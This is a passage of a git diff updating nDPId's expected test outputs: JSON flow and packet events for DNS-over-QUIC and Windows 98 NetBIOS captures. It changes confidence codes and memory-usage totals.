zJMDfapn6QTBVXFY5QqgjOXt2wlG+PDpn\/mQw9NRGoj69MbbDe3NA2MYvJlkgzXKIONO\/pMfrd3koD58ywf54r7NUNGTOOHuRxW0PSRKrZNlpqXdbaK\/wnr76JF4R3R\/+EOYL7g=="} 01111{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1606056093201,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":541,"pkt_l4_len":487,"thread_ts_msec":1606056093201,"pkt":"AAAAAAAAAAAAAAAAht1gJPSDAecRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gHnAfrr\/wAAIAhOL+O5iCYx+Qi72eOch5MP7UD5fEmqw9QcMOSnUe6MDD2OecgnWjkNXdwC4dZSYxJC82j7Fa0gkq+nfYTDU9ChVEdtH45\/vQtNEQLo8\/fwDbneJcHDHavc8EGoV3PxsxkBJhE9Q9u9yCLvfi5OphDBHPeBIHPaxUcLs3S\/L\/IXKVQgfNTTVjkzoLHy1OXpC+\/dTEnbC6NPh6W28rc+x7GLNNHF1FfqMGoKlGMxFCg2HP4dP34NipPXt9vl2rd70ScFdoNK8lXc8OrIbXPCPHixiwns3JeTqs80ZysmuTQ2x3K2Z0oX8Qiv0kbMUxxeHDtUjo8dxO3WaXzqWjfDA1saoqoMHVxUCwkVWx\/nTk4v47mIJjH5cyeRXhMbCk5EqVB08GBVQ7VrDqROkZ4dznjO7Fxcyd8w3IE3VD3OcSvdJI5P\/k+2JVbsoJApIjU\/SqrAeDrs9BCVoOX+elSyfnlFmV+9qRiAxndyJco\/u++psEVtXikdkQ7Ddxgmc8mefhAnBHbf+ng4whbMJA82KtXAE9ITJwKPkOdTXiPwFa2uYw57B9+WqNDFf9ReX9HTME9BVtddLPrQ8G9aG6w3Krk5ZmHecrC9Btpgbpsrq+OkBS2cbpJHIvCTkg=="} 00532{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093260,"flow_last_seen":1606056093260,"flow_idle_time":140000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1606056093260,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 
00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1606056093260,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":195,"pkt_l4_len":141,"thread_ts_msec":1606056093260,"pkt":"AAAAAAAAAAAAAAAAht1gAryMAI06QAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAQRnKgAAAABgJPSDAF0RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gBdAHBSTi\/juYgmMflcDuw8PGqwk7AnmnlBLKl9VVw5FwNIUr\/uwhxQriWlV5lsPREfqCWcyBCgL5DIrZMPOHK4EaoyceBY8ce9ZV4nlYvSeOP\/TgYtdDng"} -00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093260,"flow_last_seen":1606056093260,"flow_idle_time":140000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1606056093260,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093260,"flow_last_seen":1606056093260,"flow_idle_time":140000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1606056093260,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1606056093360,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":195,"pkt_l4_len":141,"thread_ts_msec":1606056093360,"pkt":"AAAAAAAAAAAAAAAAht1gAryMAI06QAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAQTEgwAAAABgJPSDAF0RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gBdAHBBTi\/juYgmMfl+TZ3+Hmg+6BC4SDTuwiFJDfNooVH1WKEmkSpLklzCTh\/kA9o9N4HNfPmXD7MqNM0jiO2jHXBOtk8kidE7CVxn0BTfngjMfjmwfG7Q"} 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1606056093560,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":195,"pkt_l4_len":141,"thread_ts_msec":1606056093560,"pkt":"AAAAAAAAAAAAAAAAht1gAryMAI06QAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAQQoBAAAAABgJPSDAF0RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gBdAHBcTi\/juYgmMfl+eB8WJkIN5W\/s2kV3mgzDwRAUXXe+90zefQTxG5fKyAbzm2S0iX0HuS+7+NHu2bYpwdweEdBhQ2oYMUDLzzaxqsrt98mI\/P6gjJFj"} -00632{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1606056093260,"flow_last_seen":1606056096363,"flow_idle_time":140000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":846,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1606056096363,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00790{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1606056093199,"flow_last_seen":1606056096363,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":3920,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1606056096363,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00632{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1606056093260,"flow_last_seen":1606056096363,"flow_idle_time":140000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":846,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1606056096363,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00790{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1606056093199,"flow_last_seen":1606056096363,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":3920,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1606056096363,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":4766,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1606056096363} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5881217 bytes -~~ total memory freed........: 5881217 bytes -~~ total allocations/frees...: 118159/118159 +~~ total memory allocated....: 6014851 bytes +~~ total memory freed........: 6014851 bytes +~~ total allocations/frees...: 120921/120921 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 2144 chars 
diff --git a/test/results/doq_adguard.pcapng.out b/test/results/doq_adguard.pcapng.out index f7a1047be..1b00e7640 100644 --- a/test/results/doq_adguard.pcapng.out +++ b/test/results/doq_adguard.pcapng.out 
@@ -2,10 +2,10 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1608278425043} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1608278425043,"flow_last_seen":1608278425043,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1608278425043,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02115{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1608278425043,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1274,"pkt_l4_len":1240,"thread_ts_msec":1608278425043,"pkt":"CL6sCxdumt9Y+uvcCABFAATsXYdAAEARno7AqAypXowODqBuAxAE2E0Zwf8AAB0S1uV91ARNGaKcpPbuz4JRKRijEV3+fOp1xbl+o2VPCxw5C7F1AESjjIExuU1VGYMi3qR5FgZXmV5jW\/GS3bvPGESTCXlAOuaNPS4Z9rqb5GmZjOPu5h+dEeHCBQsH0bRQhppRcffIYyvfvxi5LNyq540e1YcNLgxwEYv9mwEEutsUSgLF8qQi1vATlbVLiQwhaXITCRD653klYnm9BoO04fUR8kaaf1qYfex026282Q5EvztDSyWuA6xW\/3D3I27VAQo2GbCoqYf0QIrZOfacQartZRA3xvw5C0Iz0S7jBboiOrSPOxbet7b4p4CBzdW+POAUSVXQZZS3xQkY5PXEeYGco5aUsp3O0lAaLfFFVll\/srPVtdJxYLG5mlTKam3NxBl9gHT9gkoJzUoEmtdaRDaxhP5yiedQs+JgoW4F1fDqHPMPnBtk1UezjBjE\/COENcHIEQq2HIfbQ9Lv+kS5CfcaSKs2mUQTuvs7\/voDRF2y7TFb+uqyMeAqq3doSDMB2jHa\/EojP\/f+RrMNy\/X7kDEEcbw43eMXD1tzHjBj\/ncaLMsfP3IPyZyF35MF8e+053ploy3mGcl5fW5eZxUFM6FDjn\/9\/9yB7HR5pdMyplGzzI1OpdByhfvbVWjVUlFgtm4LcbCFS9YXIuJWVQaT92LVmTrycmBpec\/NHPi6MerrZrFPH1cWAKJm6C\/35hd09a7vURbcj2Nwu+wvQEGek3M9LNpTgKAxfeLa6jR7yY8FRi9Fslx+40aTEwGgLY10PqSAVV873bY1HrjXgee+hInU5OzwDGisUkG1vjenUqCdXtWODZ9xJFrjxkNSBVsfWyX84bL4AH0cHSMH3bXpv8DZGk6dvuB1thnl5dRd79ArhxOkLRjIKU\/spE2xAqe+laOg7FDuovO8+vb44+p0a1tCIq75DbW5Z\/3eQHDpNFbf\/ZruNBwv0I6n5NxcgHEUQaffXIlX36W8Z8AD3YDD85hA4jZxmySge94o03q\/ZMGs+bJTnaK8KlLmSNMXuFjJ7F4SdWbAr+gE3KQqFqqYY9ZfiG2QbB9\/YTG+8SQBafYwX6k2J2OEpMyUilzmDTz3a5eH47iPLgq2nb2F+k0c4RMx6bB8xhJbOXMxEbB5OktMbojYZ5\/D7JZ6FArciEMMkyFIwplniDv\/bjNCRjIZzGWltVCRAQBZZf0ds2kXzLEOIGMUpx2oFRtwDgwesKJgy9be1woTT3HVmrfv8vUkkFOD253UN9bBIfIU4elVEm8DEZ93RQ8PGCnqpWPqKVclryY+VrRX6bBv\/eydiZowniNJyXmSTkGKfOGX30rdpMaFIjV9VAFWlq4kC1zIbyb3K46JC+I+XxrKEmMLqMbO6CesmtgLUC8vVTv7LWODOF1NIRzdEgb8Qn\/9qSY3t6c\/zKgfF8YyVeS6jf5EL3te6RDnB0wZsaBklSDaR66VSY+qB2O5PnaefdIKM\/htIG2nKmWB0tq+\/dxdUHWEvheHhEbmX4TUB3cfXIIesE+zpUW6KXqwY9
4WHHPEMe6voxs49AJ\/2IZiFohwbn6CjrWd2PilA\/\/N7kVyw58ilFGWokoGNIRgJ61vUDU8rgEdxFK12mR1bebXKhOpf+Sf7ekcBE2R4BLb6ThrQxQ="} -00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1608278425043,"flow_last_seen":1608278425043,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1608278425043,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.adguard.com","version":"TLSv1.3","alpn":"doq-i00","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}} +00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1608278425043,"flow_last_seen":1608278425043,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1608278425043,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.adguard.com","version":"TLSv1.3","alpn":"doq-i00","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}} 
00630{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1608278425079,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1608278425079,"pkt":"mt9Y+uvcCL6sCxduCABFAACoAbMAAD8RP6dejA4OwKgMqQMQoG4AlJ+l8P8AAB0RXf586nXFuX6jZU8LHDkLsXUEXOoexyg1M1\/+GZvbsGeGqJJILJUnaeRPlfaewSkJ0QM1kILJB9RkVGFQIKTOYfD\/amFvF5G2sUWGCAnPMQAxGtra+t44CL4uNVFuP1UAIYDjP5flgPs8Cfp53+s66ugMjRy2XoqR7aApyqmdoc3EHdt+2Cg="} 02114{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1608278425084,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1274,"pkt_l4_len":1240,"thread_ts_msec":1608278425084,"pkt":"CL6sCxdumt9Y+uvcCABFAATsXYtAAEARnorAqAypXowODqBuAxAE2FXxz\/8AAB0EXOoexxFd\/nzqdcW5fqNlTwscOQuxdUBgKDUzX\/4Zm9uwZ4aokkgslSdp5E+V9p7BKQnRAzWQgskH1GRUYVAgpM5h8P9qYW8XkbaxRYYICc8xADEa2tr63jgIvi41UW4\/VQAhgOM\/l+WA+zwJ+nnf6zrq6AyNHLZeRFASnCr8obwp9Ty5sR7kprQnC0Sv2ZcsxYzIMAthEKqYU0zMuGSEznU2JvTrq\/bykaeb5dqdGxdiszDYKDU6Jn7sPAcjUZ2gh8+BYZGe9phFiloXFkZRqkF4syIAEkOpcy2MK\/fkeUIOyP6wlwkzaY3fbmuxHrqRyLu45SBR1VMQFyHi28JYz7QmMQfDMqnuI0IWIuFKHwG0T\/v0jhF19jPBzG3JSCrPoiaSUV9rQI1kZsCKoMrGjumM68QAfolXONsAd2IYudReWz3mQrB3zOSDXc7+iPJJwc0+KS52obxIkJ0I8SZ7CLjp+FpGH++2YepZGSZYPB5rc\/4HU1bQ4ocmPERQ5l+FpQxpj4cq2AJTX05VWg9LfjDFrHE6D6oMOTTfheRhy7X3SqhzfVhy\/w3RXnv00qwNGkVr8QIR+wCM95sfw88fV3+NqmU3vnLU2z+qvvT2HlvRQm9ykjYa60lgB9sFJ5Ng9ge\/cpn16AR4r\/NoOup4fo8EeFB8cFrAVg+3WG3mgWxUdvK6oND07fFN48QrriL1y7XuIB3Fa65jgY5B4zE7vkkBXKUfGormP9hug8dHVr44WkbHCTqfFJuTHKIf9gtfJ9VQps1jhQjM952WGdM\/mFbut40pSDwrgQgdt0stO2C4PvDiwgzZaEybJzcZBHCUgM8reKIoRyLrSsWciN2b3tsFQXXaEeEGdt8Bc\/5zyh11uwNSzGQ\/Fl2k7QrJleMEW
lDCFHuNFZdb7JDVOvqjlXAHTTHX0xSx0KU4aqrg\/kZVORXUFVlv\/xu8mW\/pGVbnSUQNAvLvkvHNdnu1ZPxtBzMoqU+96Xp\/DxrznNbYv32YFRLbK8kA8U4FaZhJ3oS+5KFBikdLEV9Hai2hbk8GZjN2iqviHrHccJqNkg3SIuZD5qamhaUaMG9NOa5pQ9jLJU\/ymgo7DdgKxRH8uuDjWk10CemOYV7pIj9XJEg0HHMmlI1Un6aDxtAu5UK1qm1HNb38yVa+sYeN5Ew6KHyqBUxxS4IflHX5qeqIZPOKrYg5MCubhSudLKbjcH5sXIzejKF8iZ0FlTKPdHSExxjW0QFN6bAWoLJuZE\/4kDcgHKTjdquB1S9wjg6Pah9A0AO1p8+A56ZYLVjRHdUF0Eo6bHTdn4hIgHvxPjCmO5BtWUKEeQnKGkkR8kgREjXo6GfEeHC4Vb4SCK88RJFW07bR+3U68E0sOKimZElroA+KMcE32OqnpsNULoyV7BunASAegp78gVNI0Bil4Klffm6tM6xnJr7Wx08jSGi+pGYWmiGnj3zfHIxpQuw4bIpm3S\/lud8tMnqwiD6\/bIUKO1SxVSWZBp6s2PlGyGHrgwwdIy5nXoip9OukmbhVHpu5a+3BERo9ToRhkKbGsS5gAuyL08\/F6VvMQD\/JdB+\/2rkXCT7ca7Lr49P5aV+w66D8Iwyn8BcCGyOLiGucN4S\/JjMhOeFgH9mu48hQ78o="} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":296,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":296,"flow_first_seen":1608278425043,"flow_last_seen":1608278463119,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":32013,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1608278463119,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":296,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":296,"flow_first_seen":1608278425043,"flow_last_seen":1608278463119,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":32013,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1608278463119,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":296,"source":"doq_adguard.pcapng","alias":"nDPId-test","packets-captured":296,"packets-processed":296,"total-skipped-flows":0,"total-l4-payload-len":32013,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1608278463119} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 296/296 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5888097 bytes -~~ total memory freed........: 5888097 bytes -~~ total allocations/frees...: 118431/118431 +~~ total memory allocated....: 6021731 bytes +~~ total memory freed........: 6021731 bytes +~~ total allocations/frees...: 121193/121193 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 2120 chars 
diff --git a/test/results/dos_win98_smb_netbeui.pcap.out b/test/results/dos_win98_smb_netbeui.pcap.out
index f26613ebc..92818f2da 100644
--- a/test/results/dos_win98_smb_netbeui.pcap.out
+++ b/test/results/dos_win98_smb_netbeui.pcap.out
@@ -18,12 +18,12 @@ 00354{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAACgAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgIA=="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576409797553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409797553,"pkt":"AFBW6YlWAFBWM3ieCABFAABgBwAAAIAR07fAqO+BwKjvAgCJAIkATAvHAAQpAAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFEAAAgAAHADAAgAAEABJPgAAYAAMCo74E="} 
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1576409797553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409797553,"pkt":"AFBW6YlWAFBWM3ieCABFAABgCAAAAIAR0rfAqO+BwKjvAgCJAIkATHy8AAIpAAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAaAAMCo74E="} 
